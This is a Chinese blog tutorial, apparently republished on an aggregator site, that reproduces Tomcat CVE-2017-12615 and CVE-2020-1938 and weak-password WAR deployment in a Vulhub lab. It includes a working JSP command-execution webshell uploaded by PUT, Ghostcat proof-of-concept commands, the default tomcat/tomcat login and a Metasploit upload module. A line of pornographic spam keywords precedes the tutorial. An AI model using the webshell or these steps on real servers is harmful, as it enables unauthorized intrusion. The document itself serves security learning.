国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

中間件安全—Tomcat常見漏洞

這篇具有很好參考價值的文章主要介紹了中間件安全—Tomcat常見漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

1.Tomcat常見漏洞

1.1.前言

??整個復(fù)現(xiàn)環(huán)境均使用Vulhub一鍵搭建漏洞測試靶場,Vulhub靶場:鏈接

1.2.文件上傳 (CVE-2017-12615)

1.2.1.漏洞原理

??Tomcat配置文件/conf/web.xml 配置了可寫(readonly=false),導(dǎo)致可以使用PUT方法上傳任意文件,攻擊者將精心構(gòu)造的payload向服務(wù)器上傳包含任意代碼的 JSP 文件。之后,JSP 文件中的代碼將能被服務(wù)器執(zhí)行。
tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.2.2.影響版本

??Apache Tomcat 7.0.0 – 7.0.81

1.2.3.漏洞復(fù)現(xiàn)

1.2.3.1.測試是否允許PUT

??這里修改請求方式為OPTIONS /xx HTTP/1.1,通過修改后發(fā)現(xiàn)允許PUT方法。
tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.2.3.2.驗證漏洞是否存在

??這里修改請求方式為:PUT /test.jsp/ HTTP/1.1,請求體為:<%out.print(“hacker”); %>,然后訪問test.jsp。
tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.2.3.3.訪問test.jsp
URL:http:ip地址:端口/test.jsp

tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.2.3.4.上傳執(zhí)行命令腳本

??修改請求頭PUT /test.jsp/ HTTP/1.1,修改請求體。

請求體:
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.2.3.5.執(zhí)行命令
http://ip地址:8080/test.jsp?&pwd=123&cmd=ls

tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.3.文件包含漏洞(CVE-2020-1938)

1.3.1.漏洞原理

??Tomcat 配置了兩個Connecto,它們分別是 HTTP 和 AJP :HTTP默認端口為8080,處理http請求,而AJP默認端口8009,用于處理 AJP 協(xié)議的請求,而AJP比http更加優(yōu)化,多用于反向、集群等,漏洞由于Tomcat AJP協(xié)議存在缺陷而導(dǎo)致,攻擊者利用該漏洞可通過構(gòu)造特定參數(shù),讀取服務(wù)器webapp下的任意文件以及可以包含任意文件,如果有某上傳點,上傳圖片馬等等,即可以獲取shell。

1.3.2.影響版本

??Apache Tomcat 6
??Apache Tomcat 7 < 7.0.100
??Apache Tomcat 8 < 8.5.51
??Apache Tomcat 9 < 9.0.31
??開啟了8009端口的ajp服務(wù)

1.3.3.漏洞復(fù)現(xiàn)

1.3.3.1.訪問頁面

??訪問http://your-ip:8080即可查看tomcat默認頁面,此時通過AJP協(xié)議的8009端口亦可訪問Tomcat。
tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.3.3.2.POC下載

??POC鏈接:鏈接
??當(dāng)然你也可以在kali中使用命令進行下載,檢測等,不過我這里由于網(wǎng)絡(luò)原因一直下載不下來,我就用本機下載再上傳虛擬機了。

命令:
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi  
cd CNVD-2020-10487-Tomcat-Ajp-lfi  
python CNVD-2020-10487-Tomcat-Ajp-lfi.py    #py2環(huán)境  

tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.3.3.3.POC驗證

??這里查看8009端口下的web.xml文件

命令:python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py IP地址 -p 8009 -f /WEB-INF/web.xml

tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.4.弱口令&war遠程部署

1.4.1.漏洞原理

??在tomcat8環(huán)境下默認進入后臺的密碼為tomcat/tomcat,未修改造成未授權(quán)即可進入后臺。

1.4.2.影響版本

??全版本

1.4.3.漏洞復(fù)現(xiàn)

1.4.3.1.訪問后臺

??這里首先需要先訪問后臺管理。

http://ip地址:8080/manager/html

tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.4.3.2.后臺管理

??在后臺有一個上傳war包的地方,這里就是我們用來上傳木馬的地方,這里我沒準(zhǔn)備jsp馬,我使用msf來進行操作吧。
tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.4.3.3.進入模塊

??進入msf里面的exploit/multi/http/tomcat_mgr_upload模塊。
tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器

1.4.3.4.獲取shell

??我這邊由于使用云服務(wù)器,存在反彈的端口不通,可能被攔截了,所以就沒有反彈回來。
tomcat漏洞,網(wǎng)絡(luò)安全學(xué)習(xí),# 中間件安全,tomcat,中間件,web安全,信息與通信,服務(wù)器文章來源地址http://www.zghlxwxcb.cn/news/detail-717520.html

到了這里,關(guān)于中間件安全—Tomcat常見漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 中間件安全—Apache常見漏洞

    中間件安全—Apache常見漏洞

    ??簡單介紹一下apache是什么,Apache是世界使用排名第一的Web服務(wù)器軟件。它可以運行在幾乎所有廣泛使用的計算機上,由于其跨平臺和安全性被廣泛使用,是最流行的Web服務(wù)器端軟件之一。它快速、可靠并且可通過簡單的API擴充,將python等解釋器編譯到服務(wù)器中。 1.2.1.漏洞

    2024年01月22日
    瀏覽(22)
  • 中間件安全—Nginx常見漏洞

    中間件安全—Nginx常見漏洞

    ??在上篇中間件安全—Apache常見漏洞中,并未對中間件漏洞進行解釋,這里補充一下。 ??所謂的中間件漏洞就是并非是由于代碼程序上設(shè)計存在缺陷而導(dǎo)致的漏洞,而是屬于應(yīng)用部署中環(huán)境配置不當(dāng)或使用不當(dāng)而導(dǎo)致的漏洞,同時這方面的漏洞也是最容易被管理員忽略的

    2024年02月09日
    瀏覽(22)
  • 第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    文章僅供學(xué)習(xí)交流,一些價值不高的漏洞沒復(fù)現(xiàn),日后來興趣再補坑(大概~) 文章略長,閱讀需耐心~ 視頻鏈接:? 【小迪安全】紅藍對抗 | 網(wǎng)絡(luò)攻防 | V2022全棧培訓(xùn)_嗶哩嗶哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目錄 一.知識點 二.章節(jié)內(nèi)容 1、常見中間件的安全測試 2、

    2024年02月20日
    瀏覽(27)
  • 小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    IIS現(xiàn)在用的也少了,漏洞也基本沒啥用 ?沒有和權(quán)限掛鉤 windows 2003上面的漏洞 配置不當(dāng):該漏洞與 Nginx、php 版本無關(guān),屬于用戶配置不當(dāng)造成的解析漏洞。 這個跟文件上傳類似,找到文件上傳點,上傳png圖片 找到上傳路徑和nginx版本號 查看路徑 添加后綴可以用php執(zhí)行png

    2024年02月04日
    瀏覽(26)
  • Day79:服務(wù)攻防-中間件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    Day79:服務(wù)攻防-中間件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    目錄 中間件-IIS-短文件文件解析藍屏寫權(quán)限 HTTP.SYS(CVE-2015-1635)主要用作藍屏破壞,跟權(quán)限不掛鉤 IIS短文件(iis全版本都可能有這個問題) IIS文件解析 IIS寫權(quán)限 中間件-Nginx-文件解析目錄穿越漏洞CRLF CVE-2013-4547 文件上傳 解析漏洞(配置不當(dāng)) 目錄穿越(配置不當(dāng)) CRLF注入(配置

    2024年04月08日
    瀏覽(23)
  • 中間件安全:Apache Tomcat 弱口令.(反彈 shell 拿到服務(wù)器的最高控制權(quán).)

    中間件安全:Apache Tomcat 弱口令.(反彈 shell 拿到服務(wù)器的最高控制權(quán).)

    Tomcat? 是 Apache 軟件基金會(Apache Software Foundation)的 Jakarta 項目中的一個核心項目,由 Apache、Sun 和其他一些公司及個人共同開發(fā)而成。 通過弱口令登錄后臺,部署 war 包 geshell . 中間件安全:Apache Tomcat?弱口令. Apache Tomcat 弱口令: 靶場準(zhǔn)備:Web安全:Vulfocus 靶場搭建.(漏

    2024年02月05日
    瀏覽(28)
  • Tomcat中間件打印請求日志

    Tomcat中間件打印請求日志

    修改conf下的 server.xml 文件中的 Valve 配置 主要修改pattern的值 相關(guān)pattern的含義可以參考官方文檔,這里貼上方便查詢 最后打印格式如下 在SpringBoot使用嵌入式Tomcat可以在配置文件中按照如下配置 directory可以配置相對路徑或絕對路徑,如果是相對路徑,那么最終會放在Tomcat的基

    2024年02月07日
    瀏覽(90)
  • 性能優(yōu)化-中間件tomcat調(diào)優(yōu)

    性能優(yōu)化-中間件tomcat調(diào)優(yōu)

    主要有三個: 管理Servlet應(yīng)用的生命周期。Tomcat可以管理和控制Servlet應(yīng)用程序的啟動、停止、暫停和恢復(fù)等生命周期過程,確保Servlet應(yīng)用的穩(wěn)定運行和有序管理。 把客戶端請求的url映射到對應(yīng)的servlet。Tomcat作為一個Web服務(wù)器,可以將客戶端發(fā)送的HTTP請求URL映射到相應(yīng)的Se

    2024年02月07日
    瀏覽(24)
  • 筆記:常見中間件漏洞

    Apache Shiro框架提供了記住密碼的功能(RememberMe),用戶登錄成功后會生成經(jīng)過加密并編碼的Cookie, 在服務(wù)端對rememberMe的Cookie值先base64解碼然后AES解密再反序列化 序列化:序列化=》使用密鑰進行AES加密=》base64加密 反序列化:base64解密=》使用密鑰進行AES解密=》反序列化 因為默

    2024年02月13日
    瀏覽(25)
  • Web中間件常見漏洞

    Web中間件常見漏洞 我們常見的中間件有apache,tomcat,IIS,weblogic(其實就是web容器),這些中間件可以設(shè)置支持的HTTP方法。每一個HTTP方法都有其對應(yīng)的功能,在這些方法中,PUT可以直接從客戶機上傳文件到服務(wù)器。如果中間件開放了HTTP中的PUT方法,那么惡意攻擊者就可以直接上傳

    2024年02月14日
    瀏覽(21)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包